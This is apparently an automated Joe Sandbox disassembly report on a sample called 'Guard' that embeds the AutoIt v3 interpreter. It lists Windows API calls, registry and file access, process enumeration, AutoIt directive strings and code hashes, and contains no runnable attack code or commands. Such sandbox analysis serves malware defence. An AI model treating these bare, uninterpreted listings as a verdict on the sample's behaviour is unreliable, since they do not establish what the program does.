                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                                                                                                                                                                                    • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                                                                                    • API String ID: 2660009612-1645009161
                                                                                                                                                                                                                    • Opcode ID: 28b3a555bb9d75d6e027253b8fa3db82c724cfa0a336d67517bda10e7df45c4a
                                                                                                                                                                                                                    • Instruction ID: 09765b584e724ffb9f8e324cc02f7c73a050fe5629da71decf821e0c07d12cbe
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28b3a555bb9d75d6e027253b8fa3db82c724cfa0a336d67517bda10e7df45c4a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2A1A031A00209ABCF27AF61CC42FBF37B8AF45740F158129F909AB29ADB759E11D750

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00370B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00362A3E,?,00008000), ref: 00370BA7
                                                                                                                                                                                                                      • Part of subcall function 00370284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00362A58,?,00008000), ref: 003702A4
                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00362ADF
                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00362C2C
                                                                                                                                                                                                                      • Part of subcall function 00363EBE: _wcscpy.LIBCMT ref: 00363EF6
                                                                                                                                                                                                                      • Part of subcall function 0037386D: _iswctype.LIBCMT ref: 00373875
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                            • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                            • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                            • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                            • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                            • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                                                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                                                                                                    • API String ID: 537147316-3738523708
                                                                                                                                                                                                                    • Opcode ID: 572fde2cdfce4bbad380e9b8f46c7adb6a9c8fa684aebaec33bb9ca51f088964
                                                                                                                                                                                                                    • Instruction ID: 61651e036f2a6a4bbed98063c150e822e0001bd7235071a25678e44dd0fc7af1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 572fde2cdfce4bbad380e9b8f46c7adb6a9c8fa684aebaec33bb9ca51f088964
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7202D5315083419FC726EF24C881AAFBBE5FF85314F14891DF49A9B2A2DB30D949CB52

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 003700CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00363094), ref: 003700ED
                                                                                                                                                                                                                      • Part of subcall function 003708C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0036309F), ref: 003708E3
                                                                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 003630E2
                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003A01BA
                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003A01FB
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 003A0239
                                                                                                                                                                                                                    • _wcscat.LIBCMT ref: 003A0292
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                    • API String ID: 2673923337-2727554177
                                                                                                                                                                                                                    • Opcode ID: 85342866b9e31c899c1eba0615ab735539eab6f1c0e8100c99b3ecc02748691f
                                                                                                                                                                                                                    • Instruction ID: 3d3c883b92af39c83f745cf8e9391e86e9556d7b698d5acd9df875547006e05c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85342866b9e31c899c1eba0615ab735539eab6f1c0e8100c99b3ecc02748691f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05719F715097019EC316EF65EC819ABBBE8FF95340F40892EF445CB2A1EF709944CB5A

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00364E22
                                                                                                                                                                                                                    • KillTimer.USER32(?,00000001), ref: 00364E4C
                                                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00364E6F
                                                                                                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00364E7A
                                                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00364E8E
                                                                                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00364EAF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                    • String ID: TaskbarCreated
                                                                                                                                                                                                                    • API String ID: 129472671-2362178303
                                                                                                                                                                                                                    • Opcode ID: e2b481120f379e56be1f143e8daedc4c2225667207f0b102093a51c2fe33364d
                                                                                                                                                                                                                    • Instruction ID: 8d16bfc8d03d800fb68c7ad0160a6c15fc5f868ce587c4510c24d12079713f56
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2b481120f379e56be1f143e8daedc4c2225667207f0b102093a51c2fe33364d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2441A030A48205ABDB276F64DC4DBBE3AADF741300F00C239F901965E6CBB69CA1D765

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 003707BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 003707EC
                                                                                                                                                                                                                      • Part of subcall function 003707BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 003707F4
                                                                                                                                                                                                                      • Part of subcall function 003707BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 003707FF
                                                                                                                                                                                                                      • Part of subcall function 003707BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 0037080A
                                                                                                                                                                                                                      • Part of subcall function 003707BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00370812
                                                                                                                                                                                                                      • Part of subcall function 003707BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 0037081A
                                                                                                                                                                                                                      • Part of subcall function 0036FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0035AC6B), ref: 0036FFA7
                                                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0035AD08
                                                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0035AD85
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00392F56
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                    • String ID: <wA$\tA$sA
                                                                                                                                                                                                                    • API String ID: 1986988660-1995584511
                                                                                                                                                                                                                    • Opcode ID: 598cc6d198d055fa14489600b9c8168dff90e7e777fdbda31c985bdf378bd85f
                                                                                                                                                                                                                    • Instruction ID: 9d67494c90a37c5dc27577cae4b37bb8a9c27c2c72e4cd6c6a41acc653478351
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 598cc6d198d055fa14489600b9c8168dff90e7e777fdbda31c985bdf378bd85f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1381AAB09482848ED386EF69ED846D57FF9EB48304710C67AE829CB2B2EB745444CF5D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0037593C: __FF_MSGBANNER.LIBCMT ref: 00375953
                                                                                                                                                                                                                      • Part of subcall function 0037593C: __NMSG_WRITE.LIBCMT ref: 0037595A
                                                                                                                                                                                                                      • Part of subcall function 0037593C: RtlAllocateHeap.NTDLL(01880000,00000000,00000001,?,00000004,?,?,00371003,?), ref: 0037597F
                                                                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0037101C
                                                                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00371031
                                                                                                                                                                                                                      • Part of subcall function 003787CB: RaiseException.KERNEL32(?,?,?,0040CAF8,?,?,?,?,?,00371036,?,0040CAF8,?,00000001), ref: 00378820
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                                                                                                    • String ID: `=>$h=>
                                                                                                                                                                                                                    • API String ID: 3902256705-1915909867
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 003B416D
                                                                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 003B417B
                                                                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 003B419B
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 003B4245
                                                                                                                                                                                                                    Memory Dump Source
• Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
• Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 420147892-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 003649C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,003627AF,?,00000001), ref: 003649F4
                                                                                                                                                                                                                    • _free.LIBCMT ref: 0039FB04
                                                                                                                                                                                                                    • _free.LIBCMT ref: 0039FB4B
                                                                                                                                                                                                                      • Part of subcall function 003629BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00362ADF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Bad directive syntax error, xrefs: 0039FB33
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                                                                                                                    • String ID: Bad directive syntax error
                                                                                                                                                                                                                    • API String ID: 2861923089-2118420937
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _memmove
                                                                                                                                                                                                                    • String ID: AU3! ?>$EA06
                                                                                                                                                                                                                    • API String ID: 4104443479-2947962667
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _strcat.LIBCMT ref: 003CE20C
                                                                                                                                                                                                                      • Part of subcall function 00354D37: __itow.LIBCMT ref: 00354D62
                                                                                                                                                                                                                      • Part of subcall function 00354D37: __swprintf.LIBCMT ref: 00354DAC
                                                                                                                                                                                                                    • _wcscpy.LIBCMT ref: 003CE29B
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: __itow__swprintf_strcat_wcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1012013722-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00363E72,?,?,?,00000000), ref: 00364327
                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00363E72,?,?,?,00000000), ref: 003A0717
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                    • Opcode ID: b498ffb6fba5021ddaa8fe7646b1adb44373642d0e09dc0312c3def369378728
                                                                                                                                                                                                                    • Instruction ID: 4679ec59a79320a91ebb8427d3aa00d9377119563985f97ed85a116d540d3a0c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b498ffb6fba5021ddaa8fe7646b1adb44373642d0e09dc0312c3def369378728
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D019674144349BEF3261E24CC86F667A9CEB01768F24C315FAD45A1E0C6B15C558B14
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: cd206fe5fed281e2aa72b8400bf1bc280b9df585042923e9d98d36868cf6d82b
                                                                                                                                                                                                                    • Instruction ID: c9f2ab215613cc14ac5b2cd326671c20e62c7cbc612a5d8b9e094937c6240c64
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd206fe5fed281e2aa72b8400bf1bc280b9df585042923e9d98d36868cf6d82b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3661E070600A0ADFCB12DF50C881E7AB7E9EF05301F12826DED168B6A1D774ED88DB51
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 003641B2
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                                    • Opcode ID: cff3e63bfcba7db43269d5236b36e7ac38e6c0265936e555d6607330adb75b41
                                                                                                                                                                                                                    • Instruction ID: 5af0798a216122115b932e1b22d89e393b86473e665e547615fe68765a618378
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cff3e63bfcba7db43269d5236b36e7ac38e6c0265936e555d6607330adb75b41
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D318C71A0061AAFCB19CF2CC8806ADB7B5FF59310F15C629E81997718D770BDA08B90
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00370EE7
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateSnapshotToolhelp32
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3332741929-0
                                                                                                                                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                    • Instruction ID: 792485ec6b13ec40d687d05323a05d40fb6ceea2f912bbabfa4199685a94bd8c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9331B371A00509DBD72ADF58C480969F7A6FF59300B65CAA9E409CBB51E735EDC1CBC0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                                                                                    • Opcode ID: 467b64c359aebe09832ebdbd9ff32f1e195a1806efa6457298060f656f63548a
                                                                                                                                                                                                                    • Instruction ID: ea4681feebf842dc67d52baf55d47f549f04089efaa34b475bdaad5f64135dc6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 467b64c359aebe09832ebdbd9ff32f1e195a1806efa6457298060f656f63548a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 664118B45083518FDB26DF14C494F1ABBE1BF45314F0989ACE8898B362C371EC89CB52
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00364B29: FreeLibrary.KERNEL32(00000000,?), ref: 00364B63
                                                                                                                                                                                                                      • Part of subcall function 0037547B: __wfsopen.LIBCMT ref: 00375486
                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,003627AF,?,00000001), ref: 003649F4
                                                                                                                                                                                                                      • Part of subcall function 00364ADE: FreeLibrary.KERNEL32(00000000), ref: 00364B18
                                                                                                                                                                                                                      • Part of subcall function 003648B0: _memmove.LIBCMT ref: 003648FA
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1396898556-0
                                                                                                                                                                                                                    • Opcode ID: c3e3ea86e989f60b34335ffc1b6c438116ad4e8b22147d0416e18d7366aa2b4b
                                                                                                                                                                                                                    • Instruction ID: 572d34af52a2cd6e2ea20f49273abbbef40c53fd3a00e5e91d80855b82b80719
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3e3ea86e989f60b34335ffc1b6c438116ad4e8b22147d0416e18d7366aa2b4b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B611C432A50205BBCB16FBA0CC06FAE77A9DF40701F10C42DF541AA195EB759A10A798
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                                                                                    • Opcode ID: 5ad28e36206ef590a80511e282a550ed14cadd45bf1dd52e65879f713ba77f68
                                                                                                                                                                                                                    • Instruction ID: e6142dd8cef05ba1336c0e40c210b1b389aa40160043c8c687edb6ddbd87d7d7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ad28e36206ef590a80511e282a550ed14cadd45bf1dd52e65879f713ba77f68
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21210FB4508341DFDB26DF14C455E1ABBE4BF84305F06896CF88A5B762C731E849CBA2
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00363CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00364276
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                                                    • Opcode ID: 6f8cf5ad3c70a35a1830ac7521e65e0c1cc1c250766a4cc0c09816f40de81680
                                                                                                                                                                                                                    • Instruction ID: 5e5bc8c500743a8af90afaffd129dbc32acbb317018f1b8242bcd2692214598b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f8cf5ad3c70a35a1830ac7521e65e0c1cc1c250766a4cc0c09816f40de81680
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19113A316007019FD332CF55C490B62B7F9EF88710F20C92DE8AA8AA54D7B0E845CB60
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _memmove
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4104443479-0
                                                                                                                                                                                                                    • Opcode ID: 0a78885edf71d424e7563c00fb0e003dde73f860971e72194576d82374af60c9
                                                                                                                                                                                                                    • Instruction ID: 43bf68c1f2e30450dddf05c7cda607be8f2dc5cd776de5ab9fbf00ce8c5cc5bb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a78885edf71d424e7563c00fb0e003dde73f860971e72194576d82374af60c9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D201A2B5600502AFC316DB29C441D2AF7A9FF8A3507148159F859CBB02DB30EC21CBE0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 003C4998
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: EnvironmentVariable
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1431749950-0
                                                                                                                                                                                                                    • Opcode ID: 3e5ae70303a898aad2de47832a6ef4ba8117b86ce1da3bf60a70b59423646aef
                                                                                                                                                                                                                    • Instruction ID: 18e2079b2c9e74ee9e7ffe68ee1c58aeb0a07c078d0b07c3d12fd961cb6f670a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e5ae70303a898aad2de47832a6ef4ba8117b86ce1da3bf60a70b59423646aef
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7F03176618144AF8B26EB65D846C9F7BFCEF45320B004059F9099F261EE74AD81C760
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _fseek
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2937370855-0
                                                                                                                                                                                                                    • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                                                                                                                                                    • Instruction ID: 130bc7a4fc4904d786be51f48ab75d7f3259b2bbcffe2e5ca93a8f1e2c30146b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7F08CB6400208BFDF168F84DC00DEB7B7DEB89320F00819CF9045A110D272EA218BA0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,003627AF,?,00000001), ref: 00364A63
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                    • Opcode ID: 25bad922e940bc264fe25d68fda0500018ecd81a8da95aec7a1b5c0c9cdaa59d
                                                                                                                                                                                                                    • Instruction ID: b6ba16e716f1268e0186250438ecf2fda5ada4a07c7f0d0282602fd14b5093ab
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 25bad922e940bc264fe25d68fda0500018ecd81a8da95aec7a1b5c0c9cdaa59d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70F08571940702EFCB3A8FA4E480816BBF5AF04325320CA3EE1DB87A14C3319984CB14
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: __fread_nolock
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2638373210-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _wcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3048848545-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 003709E4
                                                                                                                                                                                                                      • Part of subcall function 00361821: _memmove.LIBCMT ref: 0036185B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LongNamePath_memmove
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2514874351-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 003B4D31
                                                                                                                                                                                                                      • Part of subcall function 00361821: _memmove.LIBCMT ref: 0036185B
                                                                                                                                                                                                                    Memory Dump Source
